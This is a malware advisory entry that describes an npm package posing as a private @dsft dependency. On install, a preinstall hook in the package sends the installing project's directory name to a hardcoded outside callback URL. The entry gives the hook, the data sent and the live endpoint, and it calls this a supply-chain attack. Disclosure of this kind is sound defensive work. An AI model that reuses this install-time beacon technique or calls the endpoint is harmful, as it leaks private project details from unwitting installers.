MAL-2026-5889

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7a7ba80413e901c3cf618c92bd61dc6942bf167fac46b0dc7c554a4a06f705c1) On `npm install`, the package's preinstall hook (`preinstall: node index.js` in package.json) executes index.js, which reads `process.env.INIT_CWD`, derives the installing project's directory name via `path.basename()`, and POSTs a JSON beacon `{pkg, timestamp, transport, project}` to a hardcoded callback URL `https://deepbounty.dd06-dev.fr/cb/e51c2215-3fa8-48f1-ad64-1cf792e0cccc`. The package is published under the `@dsft` scope and self-describes as a dependency-confusion PoC (`description: Security PoC for Bug Bounty`; index.js comment: `Harmless dependency confusion PoC`). Any build pipeline that expects a private `@dsft/ft-element` package and resolves to this public version will silently leak the project's directory name — which typically equals the private package/repo name — to a third-party endpoint, confirming a successful dependency-confusion takeover target. Installers receive no disclosure or consent. Although the author frames this as harmless research, the mechanism (unconditional install-time beacon containing host-identifying context to an attacker-controlled URL) is a supply-chain attack against any installer the scope collision affects.